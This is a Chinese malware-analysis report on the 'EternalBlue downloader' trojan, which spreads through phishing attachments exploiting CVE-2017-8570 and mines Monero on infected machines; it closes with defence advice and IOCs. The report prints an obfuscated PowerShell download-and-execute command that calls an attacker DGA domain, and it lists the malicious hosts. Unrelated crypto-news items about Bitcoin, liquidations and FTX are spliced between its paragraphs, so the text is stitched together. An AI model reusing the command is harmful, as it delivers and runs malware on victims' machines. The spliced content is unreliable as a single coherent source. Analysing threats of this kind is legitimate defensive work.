COM:“永恒之蓝下载器木马”新增钓鱼邮件传播，利用用户机器挖矿门罗币

来源：腾讯御见威胁情报中心

编者注：原标题为《“永恒之蓝下载器木马”新增钓鱼邮件传播，附件含CVE-2017-8570漏洞攻击代码》

“永恒之蓝”下载器木马在感染用户机器上运行后，会自动当前用户的邮箱通讯录并发送附件为urgent.doc的文档，该文档附带CVE-2017-8570漏洞攻击代码。

以太坊近期波动幅度将小于比特币，或吸引更多长期投资者:5月22日消息，根据分析公司Glassnode跟踪的数据，比特币的价格区间陷入了几个月来的最低水平，在截至5月21日的7天内达到的最高价和最低价仅相差3.4%，这是过去三年来最窄的交易区间之一。“这与2023年1月和2020年7月相当，这两个时间点都在市场大幅波动之前。这表明高波动性可能即将到来，”Glassnode周一早些时候在推特上写道。最近，比特币和以太坊基于期权的波动率指标也创下了历史新低。狭窄的交易区间表明，看涨和看跌的前景都没有主导价格走势。当市场面临相互竞争的影响和叙事时，这种情况通常会发生。尽管挥之不去的美国银行业问题有利于比特币等被视为避险资产的上涨，但债务上限谈判的僵局尚未解决以及美元指数的回升表明情况并非如此。[2023/5/22 15:18:39]

如果被攻击用户收到邮件并不慎打开文档，就可能触发漏洞执行Powershell命令下载mail.jsp：

过去24小时价值约1亿美元的杠杆头寸被清算:金色财经报道，根据 Coinglass 的数据，过去 24 小时价值约 1 亿美元的杠杆头寸被清算。其中 82% 来自空头头寸。大部分清算来自 BTC 头寸，约为 4100 万美元，其次是 ETH，约为 2150 万美元。[2023/4/26 14:28:28]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

SBF：FTX 拥有足够的资产来覆盖所有用户存款，在客户资产方面受到严格监管:11月7日消息，FTX创始人 Sam Bankman-Fried（SBF）在社交媒体上称，FTX 拥有足够的资产来覆盖所有用户存款，且不会利用客户资产来进行投资，目前 FTX 仍在处理客户提款。SBF 表示，FTX 在客户资产方面受到严格监管，且经过基于美国通用会计准则的审计，拥有超 10 亿美元的现金。[2022/11/8 12:29:47]

而下载使用的域名ap35nf7.jp实际上并没有注册，但是依然能够解析到地址：t.awcna.com，是因为被感染机器的本地hosts文件被篡改，使得随机生成的域名映射到木马使用的恶意地址，细节请参考御见威胁情报中心此前发布的报告：《“永恒之蓝下载器”木马篡改hosts指向随机域名，再用多个漏洞攻击内网挖矿》。

本次攻击过程中，木马将使用随机生成的字符加“.cn”或”.jp“或”.kr“后缀作为DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp经过高度混淆，多次解密后可以看到其安装多个计划任务下载Powershell脚本执行，并使用了新的计划任务名：

“Bluetea“蓝茶。

“永恒之蓝”下载器木马自出现之后从未停止更新，从最初的PE样本攻击到后来转移为以Powershell无文件攻击方式躲避查杀，并且通过安装多个类型的计划任务进行持久化。在传播方式上，最初通过供应链攻击积累一批感染机器后，又不断利用”永恒之蓝”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法进行扩散传播，近期又增加了DGA域名攻击和钓鱼邮件攻击，其最终目的只为利用用户机器挖矿门罗币获利。

永恒之蓝下载器木马的历次版本更新参考下表：

安全建议

1.建议用户不要轻易打开不明来源的邮件附件，对于邮件附件中的文件要格外谨慎运行，如发现有脚本或其他可执行文件可先使用杀软件进行扫描；

2.服务器使用安全的密码策略，特别是IPC$、MSSQL、RDP账号密码，切勿使用弱口令，避免遭遇弱密码爆破攻击；

3.根据微软安全公告及时修复Office漏洞CVE-2017-8570，需进行漏洞扫描和修复，或采用WindowsUpdate进行。

IOCs

http//t.awcna.com/mail.jsp

标签：COMFTXPOWERSHELLCOMC价格DFNORM Vault (NFTX)POWER价格SHELL币

PEPE币热门资讯